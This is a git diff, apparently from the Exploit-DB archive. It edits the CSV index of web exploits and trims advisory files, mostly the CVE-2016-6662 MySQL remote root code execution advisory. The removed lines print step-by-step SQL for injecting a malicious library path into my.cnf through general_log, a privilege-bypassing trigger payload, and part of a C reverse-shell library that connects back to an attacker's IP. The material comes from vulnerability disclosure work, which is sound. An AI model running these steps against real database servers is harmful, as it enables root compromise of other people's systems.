PAL",php,webapps,0 +29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - '404.php' Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0 29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 - Calendar_Panel Module Show_Event.php SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0 29821,platforms/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0 @@ -31347,7 +31344,6 @@ id,file,description,date,author,platform,type,port 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps,0 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 -31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - pref.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 @@ -31756,7 +31752,6 @@ id,file,description,date,author,platform,type,port 31653,platforms/php/webapps/31653.txt,"amfPHP 1.2 - browser/details class Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Parameter Remote File Inclusion",2008-04-15,THuM4N,php,webapps,0 31655,platforms/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Inclusion",2008-04-15,THuGM4N,php,webapps,0 -31657,platforms/php/webapps/31657.txt,"Blogator-script 0.95 - 'bs_auth.php' Cross-Site Scripting",2008-04-16,ZoRLu,php,webapps,0 31658,platforms/php/webapps/31658.txt,"MyBoard 1.0.12 - 'rep.php' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31659,platforms/php/webapps/31659.txt,"PHP-Stats 0.1.9.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-17,ZoRLu,php,webapps,0 31660,platforms/php/webapps/31660.txt,"EsContacts 1.0 - add_groupe.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 @@ -31765,7 +31760,7 @@ id,file,description,date,author,platform,type,port 31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 - importer.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 - 'login.php' msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 - search.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 -31666,platforms/asp/webapps/31666.txt,"CoBaLT 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0 +31666,platforms/asp/webapps/31666.txt,"Cobalt 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0 31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injections",2008-04-18,ZoRLu,php,webapps,0 31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 31670,platforms/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Parameter Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 @@ -32060,7 +32055,6 @@ id,file,description,date,author,platform,type,port 32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 -32103,platforms/php/webapps/32103.txt,"VisualPic 0.3.1 - Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0 32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 32107,platforms/php/webapps/32107.txt,"Claroline 1.8 - user/user.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 32108,platforms/php/webapps/32108.txt,"Claroline 1.8 - tracking/courseLog.php view Parameter Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 @@ -32528,8 +32522,6 @@ id,file,description,date,author,platform,type,port 32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",java,webapps,0 32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps,0 32903,platforms/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,asp,webapps,0 -32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 -32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 - new_images.php Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - 'apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0 32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0 32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0 @@ -33145,7 +33137,6 @@ id,file,description,date,author,platform,type,port 34095,platforms/php/webapps/34095.txt,"PonVFTP - 'login.php' SQL Injection",2010-01-15,S2K9,php,webapps,0 34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x - manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0 34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x - manage/main.php fld_path Parameter Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",php,webapps,0 -34154,platforms/php/webapps/34154.txt,"Software Index - 'signinform.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0 34155,platforms/php/webapps/34155.txt,"Ceica-GW - 'login.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0 34157,platforms/php/webapps/34157.txt,"Firebook - Multiple Cross-Site Scripting / Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 @@ -36262,7 +36253,7 @@ id,file,description,date,author,platform,type,port 39269,platforms/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0 39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - options-general.php Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0 39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0 -39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0 +39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",php,webapps,0 39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 39279,platforms/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 @@ -36784,3 +36775,5 @@ id,file,description,date,author,platform,type,port 40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0 40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0 40756,platforms/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps,0 +40771,platforms/php/webapps/40771.txt,"Wordpress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0 +40772,platforms/php/webapps/40772.txt,"Wordpress Plugin Sirv 1.3.1 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0 diff --git a/platforms/asp/webapps/16178.txt b/platforms/asp/webapps/16178.txt index edad23e8c..d560430b3 100755 --- a/platforms/asp/webapps/16178.txt +++ b/platforms/asp/webapps/16178.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45211/discuss +source: http://www.securityfocus.com/bid/45211/info Real Estate Single is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/platforms/asp/webapps/16179.txt b/platforms/asp/webapps/16179.txt index 627979b7b..eb0a65239 100755 --- a/platforms/asp/webapps/16179.txt +++ b/platforms/asp/webapps/16179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45212/discuss +source: http://www.securityfocus.com/bid/45212/info Multi Agent System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/platforms/linux/local/40360.txt b/platforms/linux/local/40360.txt index e49350d5b..1aa59e7be 100755 --- a/platforms/linux/local/40360.txt +++ b/platforms/linux/local/40360.txt @@ -1,555 +1,18 @@ - - -============================================= -- Discovered by: Dawid Golunski -- http://legalhackers.com -- dawid (at) legalhackers.com - -- CVE-2016-6662 -- Release date: 12.09.2016 -- Last updated: 23.09.2016 -- Revision: 3 -- Severity: Critical -============================================= - - -I. VULNERABILITY -------------------------- - -MySQL <= 5.7.14 Remote Root Code Execution / Privilege Escalation (0day) - 5.6.32 - 5.5.51 - -MySQL clones are also affected, including: - -MariaDB -PerconaDB - - -II. BACKGROUND -------------------------- - -"MySQL is the world's most popular open source database. -Whether you are a fast growing web property, technology ISV or large -enterprise, MySQL can cost-effectively help you deliver high performance, -scalable database applications." - -"Many of the world's largest and fastest-growing organizations including -Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time -and money powering their high-volume Web sites, business-critical systems and -packaged software." - -http://www.mysql.com/products/ -http://www.mysql.com/why-mysql/ -http://db-engines.com/en/system/MySQL - - -III. INTRODUCTION -------------------------- - -An independent research has revealed multiple severe MySQL vulnerabilities. -This advisory focuses on a critical vulnerability with a CVEID of CVE-2016-6662 -which can allow attackers to (remotely) inject malicious settings into MySQL -configuration files (my.cnf) leading to critical consequences. - -The vulnerability affects all MySQL servers in default configuration in all -version branches (5.7, 5.6, and 5.5) including the latest versions, and could -be exploited by both local and remote attackers. -Both the authenticated access to MySQL database (via network connection or web -interfaces such as phpMyAdmin) and SQL Injection could be used as exploitation -vectors. - -As SQL Injection attacks are one of the most common issues in web applications, -the CVE-2016-6662 vulnerabilty could put web applications at a critical risk in -case of a successful SQL Injection attack. - -A successful exploitation could allow attackers to execute arbitrary code with -root privileges which would then allow them to fully compromise the server on -which an affected version of MySQL is running. - -The vulnerability can be exploited even if security modules SELinux and AppArmor -are installed with default active policies for MySQL service on major Linux -distributions. - -This advisory provides a Proof-Of-Concept MySQL exploit which demonstrates how -Remote Root Code Execution could be achieved by attackers. - - -IV. DESCRIPTION -------------------------- - -The default MySQL package comes with a mysqld_safe script which is used by many -default installations/packages of MySQL as a wrapper to start the MySQL service -process which can observed, for example, in case of the following fully-updated -Debian system: - -root@debian:~# lsb_release -a -No LSB modules are available. -Distributor ID: Debian -Description: Debian GNU/Linux 8.5 (jessie) -Release: 8.5 -Codename: jessie - -root@debian:~# dpkg -l | grep -i mysql-server -ii mysql-server 5.5.50-0+deb8u1 -ii mysql-server-5.5 5.5.50-0+deb8u1 -ii mysql-server-core-5.5 5.5.50-0+deb8u1 - -After starting MySQL (installed from packages provided in the default Debian repositories) by running - -root@debian:~# service mysql start - -or, alternatively: - -root@debian:~# /etc/init.d/mysql start - -The MySQL server process tree looks as follows: - -root 14967 0.0 0.1 4340 1588 ? S 06:41 0:00 /bin/sh /usr/bin/mysqld_safe - -mysql 15314 1.2 4.7 558160 47736 ? Sl 06:41 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306 - - -As can be seen, the mysqld_safe wrapper script is executed as root, whereas the -main mysqld process drops its privileges to mysql user. - - -The wrapper script has the following function : - -----[ /usr/bin/mysqld_safe ]---- - -[...] - -# set_malloc_lib LIB -# - If LIB is empty, do nothing and return -# - If LIB is 'tcmalloc', look for tcmalloc shared library in /usr/lib -# then pkglibdir. tcmalloc is part of the Google perftools project. -# - If LIB is an absolute path, assume it is a malloc shared library -# -# Put LIB in mysqld_ld_preload, which will be added to LD_PRELOAD when -# running mysqld. See ld.so for details. -set_malloc_lib() { - malloc_lib="$1" - - if [ "$malloc_lib" = tcmalloc ]; then - pkglibdir=`get_mysql_config --variable=pkglibdir` - malloc_lib= - # This list is kept intentionally simple. Simply set --malloc-lib - # to a full path if another location is desired. - for libdir in /usr/lib "$pkglibdir" "$pkglibdir/mysql"; do - for flavor in _minimal '' _and_profiler _debug; do - tmp="$libdir/libtcmalloc$flavor.so" - #log_notice "DEBUG: Checking for malloc lib '$tmp'" - [ -r "$tmp" ] || continue - malloc_lib="$tmp" - break 2 - done - done - -[...] - -----------[ eof ]--------------- - - -which can be used to preload a shared library before starting the server. - -The library can be set with the following parameter: - ---malloc-lib=LIB - -This parameter can also be specified within a mysql config file (my.cnf) -in a '[mysqld]' or '[mysqld_safe]' section. - -If an attacker managed to inject a path to their malicious library within the -config, they would be able to preload an arbitrary library and thus execute -arbitrary code with root privileges when MySQL service is restarted. -The restart could be triggered manually, via a system update, package update -(including an update of dependencies), system reboot etc.). -Attackers might also be able to speed up the server restart remotely by issuing -a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin. - -In 2003 a vulnerability was disclosed in MySQL versions before 3.23.55 that -allowed users to create mysql config files with a simple statement: - -SELECT * INTO OUTFILE '/var/lib/mysql/my.cnf' - -The issue was fixed by refusing to load config files with world-writable -permissions as these are the default permissions applied to files created -by OUTFILE query. -As an additional protection, OUTFILE/DUMPFILE statements are prohibited from -overwrite existing files. -This protects existing configuration files. -The old vulnerability has been considered fixed ever since the MySQL 3.23.55 -was released in 2003, and writing to configuration files has been considered -impossible. - -However, the V. PROOF OF CONCEPT section below will show that it is possible to -successfully bypass current restrictions by abusing MySQL logging functions -(available in every MySQL install by default) to achieve the following: - -1) Inject malicious configuration into existing MySQL configuration files on -systems with weak/improper permissions (configs owned by/writable by mysql user) -(SCENARIO 1). - -2) Create new configuration files within a MySQL data directory (writable -by MySQL by default) on _default_ MySQL installs without the need to rely on -improper config permissions (SCENARIO 2). - -3) Attackers with only SELECT/FILE permissions can gain access to logging -functions (normally only available to MySQL admin users) on all of the -_default_ MySQL installations and thus be in position to add/modify MySQL -config files. - - -Update (16/09/2016): -The proof of concept details below should be read closely as there have been -some misconceptions noticed on some security forums which incorrectly try -to lessen the severity of this vulnerability due to a lack of correct -understanding of the issues presented in this advisory. -It should be noted that: - -* SCENARIO 2 (point 2 above) is _independent_ of SCENARIO 1 (point 1 above). -I.e the config injection vulnerability which ultimately leads to loading -arbitrary malicious shared libraries CAN be exploited EVEN if there are NO -my.cnf config files with insecure permissions available on the system. -In other words, weak permissions are NOT a requirement for exploitation, and -the vulnerability CAN be exploit on affected DEFAULT PerconaDB/MariaDB/MySQL -installations with CORRECT permissions set on ALL my.cnf files available on -the system by default. -The SCENARIO 1 has only been presented as it makes the exploit code much -simpler and allows to explain the logging abuse/config injection vulnerability -without exposing default installations (SCENARIO 2) to an immediate risk. - -* The researcher has created a private working PoC that has not been shared -publicly which CAN successfully exploit SCENARIO 2 (default setup/no incorrect -permissions on any of the default my.cnf config files). As noted both in the -section below as well as in the current PoC exploit's comments, the current -PoC is limited. It has been purposefully limited to protect immediate -exploitation of default installations (no incorrect perms on my.cnf) and give -users time to react to the vulnerability. - -* A successful exploitation of SCENARIO 2 (no my.cnf available with weak perms) -leading to root privilege escalation/code execution can _ALSO_ (however is NOT a -requirement) be achieved by means of a (separate) vulnerability: CVE-2016-6663. -PoC has been created by the author of this advisory but not released publicly. - -* The logging facility CAN be accessed by standard users with SELECT/FILE -privileges only. I.e SUPER privilege is NOT required to create malicious triggers -which contain the malicious payload that grants the attacker access to the -logging facility DESPITE the LACK of administrative privileges. -This has been explained in the section below (see point 3 in the section below) -and proven in the current PoC in this advisory and can also be observed in the -replication steps (see VI. section) that show the attacker database account -permissions (the attacker DB account is NOT assigned SUPER permissions). - -* The exploitation requires a restart that could happen via a number of ways. -Attackers might also be able to speed up the server restart remotely by issuing -a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin. - - -V. PROOF OF CONCEPT -------------------------- - - -1) Inject malicious configuration into existing MySQL configuration files on -systems with weak/improper permissions (configs owned by/writable by mysql user). -(SCENARIO 1) -~~~~~~~~~~~~~~~~~~~~~~~~~ - -MySQL configuration files are loaded from all supported locations and processed -one by one when mysqld_safe script is executed. - -Exact config locations depend on MySQL version. -For example, as described on: -http://dev.mysql.com/doc/refman/5.5/en/option-files.html -for MySQL 5.5 the config locations include: - -/etc/my.cnf Global options -/etc/mysql/my.cnf Global options -SYSCONFDIR/my.cnf Global options -$MYSQL_HOME/my.cnf Server-specific options -defaults-extra-file The file specified with --defaults-extra-file=file_name, if any -~/.my.cnf User-specific options - -There is a common misconception that mysql config files should be owned by mysql -user for the server to work properly. -Many installation guides, or even security guides often wrongly advise users -to set the ownership of mysql config files/directories such as /etc/mysql -or /etc/my.cnf to mysql user. - -For example: -https://github.com/willfong/mariadb-backup/blob/master/README.md -says: - -"Lock down permissions on config file(s) - -chown mysql /etc/my.cnf -chmod 600 /etc/my.cnf" - -Whereas the article at: -http://www.devshed.com/c/a/mysql/security-issues-with-mysql/ -mentions: - -"You should also protect the global option file, /etc/my.cnf, if it exists. -The mysql user should own it and have read/write access to it, but other users -need only read access: - -shell> chown mysql /etc/my.cnf" - -Moreover, there are also MySQL recipes for installation automation software -such as Chef that also provide users with vulnerable permissions on my.cnf -config files. - -If any of the MySQL config files is owned by mysql user, an attacker could -append malicious config entries to it as follows: - -root@debian:~/# ls -l /etc/my.cnf --rw-r--r-- 1 mysql mysql 72 Jul 28 17:20 /etc/my.cnf - -root@debian:~/# cat /etc/my.cnf - -[mysqld] - -key_buffer = 16M -max_allowed_packet = 16M - - -Attacker could run the following SQL queries: - -mysql> set global general_log_file = '/etc/my.cnf'; -mysql> set global general_log = on; -mysql> select ' - '> - '> ; injected config entry - '> - '> [mysqld] - '> malloc_lib=/tmp/mysql_exploit_lib.so - '> - '> [separator] - '> - '> '; -1 row in set (0.00 sec) -mysql> set global general_log = off; - -The resulting config would then have the following part appended: - -root@debian:~/# cat /etc/my.cnf - -[mysqld] - -key_buffer = 16M -max_allowed_packet = 16M - -/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: -Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock -Time Id Command Argument -160728 17:25:14 40 Query select ' - -; injected config entry - -[mysqld] -malloc_lib=/tmp/mysql_exploit_lib.so - -[separator] - -' -160728 17:25:15 40 Query set global general_log = off - - -This config contains some redundant information that would normally cause MySQL -to fail to startup during a restart due to parsing issues. - -However, the important part is that the config now contains the section: - -[mysqld] -malloc_lib=/tmp/mysql_exploit_lib.so - -mysqld_safe will read the shared library path correctly and add it to -the LD_PRELOAD environment variable before the startup of mysqld daemon. -The preloaded library can then hook the libc fopen() calls and clean up -the config before it is ever processed by mysqld daemon in order for it -to start up successfully so that the compromise goes unnoticed by the -system administrators etc. - - - -~~~~~~~~~~~~~~~~~~~~~~~~~ -2) Create new configuration files within a MySQL data directory (writable -by MySQL by default) on _default_ MySQL installs without the need to rely on -improper config permissions. -(SCENARIO 2) - - -Analysis of the mysqld_safe script has shown that in addition to the -config locations provided above, mysqld_safe also loads the configuration file -from the mysql data directory (/var/lib/mysql/my.cnf) by default as can be -seen below: - -----[ /usr/bin/mysqld_safe ]---- - -[...] -# Try where the binary installs put it -if test -d $MY_BASEDIR_VERSION/data/mysql -then - DATADIR=$MY_BASEDIR_VERSION/data - if test -z "$defaults" -a -r "$DATADIR/my.cnf" - then - defaults="--defaults-extra-file=$DATADIR/my.cnf" - fi -[...] - -----------[ eof ]--------------- - -on MySQL versions in branches 5.5 and 5.6. -The datadir location for my.cnf has only been removed from MySQL starting -from 5.7 branch however in many configurations it will still load config -from: - -/var/lib/mysql/.my.cnf - -The data directory /var/lib/mysql is (obviously) writable by mysql user on -every install: - -root@debian:~# ls -ld /var/lib/mysql/ -drwx------ 4 mysql mysql 4096 Jul 28 06:41 /var/lib/mysql/ - -Therefore, if no mysql-owned configs are available on the system, an attacker -could still be able to exploit the vulnerability by creating a config at the -following locations: - -/var/lib/mysql/my.cnf -/var/lib/mysql/.my.cnf - -As mentioned, using FILE permission to create such a file with the SQL statement: - -SELECT 'malicious config entry' INTO OUTFILE '/var/lib/mysql/my.cnf' - -would not work, as MySQL creates files with rw permissions for the world: - --rw-rw-rw- 1 mysql mysql 4 Jul 28 07:46 /var/lib/mysql/my.cnf - -and MySQL would prevent such world-writable config from being loaded at startup. - -Attackers could bypass this however by using these logging SQL statements: - -mysql> set global general_log_file = '/var/lib/mysql/my.cnf'; -mysql> set global general_log = on; -mysql> select ' - '> - '> ; injected config entry - '> - '> [mysqld] - '> malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so - '> - '> [separator] - '> - '> '; -1 row in set (0.00 sec) -mysql> set global general_log = off; - -The queries will create the my.cnf file with the necessary permissions -(without o-w bit) for it to be parsed by the MySQL daemon: - -# ls -l /var/lib/mysql/my.cnf --rw-rw---- 1 mysql mysql 352 Jul 28 17:48 /var/lib/mysql/my.cnf - -The file will have the following contents: - -# cat /var/lib/mysql/my.cnf -/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: -Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock -Time Id Command Argument -160728 17:48:22 43 Query select ' - -; injected config entry - -[mysqld] -malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so - -[separator] - -' -160728 17:48:23 43 Query set global general_log = off - - -One problem will remain however. MySQL will refuse files that do not start with -a valid [section] header with the message: - -error: Found option without preceding group in config file: /var/lib/mysql/my.cnf at line: 1 -Fatal error in defaults handling. Program aborted - -Further testing has however proven that IT IS possible to bypass this security -restriction as well but this will not be included in this advisory/PoC for the -time being. - -It is worth to note that attackers could use one of the other vulnerabilities -discovered by the author of this advisory which has been assigned a CVEID of -CVE-2016-6663 and is pending disclosure. -The undisclosed vulnerability makes it easy for certain attackers to create -/var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege -requirement. - - - - -~~~~~~~~~~~~~~~~~~~~~~~~~ -3) Attackers with only SELECT/FILE permissions can gain access to logging functions -(normally only available to MySQL admin users) on all of the _default_ MySQL -installations and thus be in position to add/modify MySQL config files. - - -If attackers do not have administrative rights required to access logging settings -and only have standard user privileges with the addition of FILE privilege then -they could still gain the ability to write to / modify configuration files. - -This could be achieved by writing a malicious trigger payload - a trigger -definition that is an _equivalent_ to the following statement: - -CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf -AFTER INSERT - ON `active_table` FOR EACH ROW -BEGIN - DECLARE void varchar(550); - set global general_log_file='/var/lib/mysql/my.cnf'; - set global general_log = on; - select " -[mysqld] -malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so' - -" INTO void; - set global general_log = off; -END; - -into a trigger definition/configuration file (.TRG) of an actively used table -('active_table') with the use of a statement similar to: - -SELECT '...trigger_definition...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG' - -Note that _only_ the above SELECT statement is required to write out the trigger -definition by abusing the power of FILE privilege. -The CREATE TRIGGER statement is _never_ executed and is not necessary. This -means that SUPER privilege is not necessary either. See the exploit code for -details. - -Such trigger will be loaded when tables get flushed. From this point on -whenever an INSERT statement is invoked on the table, e.g: - -INSERT INTO `active_table` VALUES('xyz'); - -The trigger's code will be executed with mysql root/admin privileges (notice -'DEFINER' above) and will thus let attacker to modify the general_log settings -despite the lack of administrative/SUPER privileges through their user account -(with SELECT/FILE privileges only). - - ------------------- -VI. PROOF OF CONCEPT - 0day 0ldSQL_MySQL_RCE_exploit.py exploit - - -----------[ 0ldSQL_MySQL_RCE_exploit.py ]-------------- - #!/usr/bin/python +# +# MySQL / MariaDB / Percona - Remote Root Code Execution / PrivEsc PoC Exploit +# (CVE-2016-6662) +# 0ldSQL_MySQL_RCE_exploit.py (ver. 1.0) +# +# For testing purposes only. Do no harm. +# +# Discovered/Coded by: +# +# Dawid Golunski +# http://legalhackers.com +# +# # This is a limited version of the PoC exploit. It only allows appending to # existing mysql config files with weak permissions. See V) 1) section of # the advisory for details on this vector. @@ -562,9 +25,16 @@ VI. PROOF OF CONCEPT - 0day 0ldSQL_MySQL_RCE_exploit.py exploit # for certain low-privileged attackers that do not have FILE privilege. # # See full advisory for details: -# http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt +# https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html # +# Video PoC: +# https://legalhackers.com/videos/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html +# +# +# Follow: https://twitter.com/dawid_golunski +# & # Stay tuned ;) +# intro = """ 0ldSQL_MySQL_RCE_exploit.py (ver. 1.0) @@ -669,8 +139,8 @@ with open(hookandrootlib_path, 'rb') as f: content = f.read() hookandrootlib_hex = binascii.hexlify(content) -# Trigger payload that will elevate user privileges and successfully execute SET GLOBAL GENERAL_LOG -# in spite of the lack of SUPER/admin privileges (attacker only needs SELECT/FILE privileges) +# Trigger payload that will elevate user privileges and sucessfully execute SET GLOBAL GENERAL_LOG +# in spite of the lack of SUPER/admin privileges (attacker only needs SELECT/FILE privileges). # Decoded payload (paths may differ) will look similar to: """ DELIMITER // @@ -776,437 +246,3 @@ info("""Stay tuned for the CVE-2016-6663 advisory and/or a complete PoC that can # Shutdown shutdown(0) - - ---------------------------------------------------- - - - - - -----------[ mysql_hookandroot_lib.c ]-------------- - -/* - -(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit -mysql_hookandroot_lib.c - -This is the shared library injected by 0ldSQL_MySQL_RCE_exploit.py exploit. -The library is meant to be loaded by mysqld_safe on mysqld daemon startup -to create a reverse shell that connects back to the attacker's host on -6603 port (mysql port in reverse ;) and provides a root shell on the -target. - -mysqld_safe will load this library through the following setting: - -[mysqld] -malloc_lib=mysql_hookandroot_lib.so - -in one of the my.cnf config files (e.g. /etc/my.cnf). - -This shared library will hook the execvp() function which is called -during the startup of mysqld process. -It will then fork a reverse shell and clean up the poisoned my.cnf -file in order to let mysqld run as normal so that: -'service mysql restart' will work without a problem. - -Before compiling adjust IP / PORT and config path. - - -~~ -Discovered/Coded by: - -Dawid Golunski -http://legalhackers.com - - -~~ -Compilation (remember to choose settings compatible with the remote OS/arch): - -gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl - -Disclaimer: - -For testing purposes only. Do no harm. - -Full advisory URL: -http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt - -*/ - -#define _GNU_SOURCE -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define ATTACKERS_IP "127.0.0.1" -#define SHELL_PORT 6033 -#define INJECTED_CONF "/var/lib/mysql/my.cnf" - -char* env_list[] = { "HOME=/root", NULL }; -typedef ssize_t (*execvp_func_t)(const char *__file, char *const __argv[]); -static execvp_func_t old_execvp = NULL; - - -// fork & send a bash shell to the attacker before starting mysqld -void reverse_shell(void) { - - int i; int sockfd; - //socklen_t socklen; - struct sockaddr_in srv_addr; - srv_addr.sin_family = AF_INET; - srv_addr.sin_port = htons( SHELL_PORT ); // connect-back port - 